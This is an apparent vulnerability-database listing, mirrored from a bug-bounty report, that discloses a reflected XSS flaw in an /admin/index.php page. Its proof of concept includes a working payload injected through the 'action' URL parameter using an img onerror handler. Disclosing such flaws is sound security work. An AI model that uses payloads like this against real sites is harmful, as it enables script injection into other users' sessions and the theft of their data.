Reflected XSS in /admin/index.php - vulnerability database | Vulners.com
huntr / Ngductung / FBFD4E84-61FB-4063-8F11-15877B8C1F6F
History: Sep 30, 2023 - 6:39 a.m.

Reflected XSS in /admin/index.php

2023-09-30 06:39:57
ngductung
www.huntr.dev
6
website security
xss
proof of concept
video poc
bug bounty
admin panel

AI Score: 7.2 High (Confidence: Low)

EPSS: 0.0005 Low (Percentile: 17.1%)

Description

I noticed your website is very secure, but you overlooked an XSS flaw.

Proof of Concept

  1. Access the demo website
  2. Access admin/index.php?action=ngductung"><img src/onerror="alert('XSS')
  3. Detect XSS

Video PoC

https://ngductung-my.sharepoint.com/:v:/g/personal/ngductung_ngductung_id_vn/EcbTzZBsrXZBuZdf2aScnQ0BOWeP44cBiTwnpDIoV79aOQ?nav=eyJyZWZlcnJhbEluZm8iOnsicmVmZXJyYWxBcHAiOiJPbmVEcml2ZUZvckJ1c2luZXNzIiwicmVmZXJyYWxBcHBQbGF0Zm9ybSI6IldlYiIsInJlZmVycmFsTW9kZSI6InZpZXciLCJyZWZlcnJhbFZpZXciOiJNeUZpbGVzTGlua0RpcmVjdCJ9fQ&e=Zqdo9L
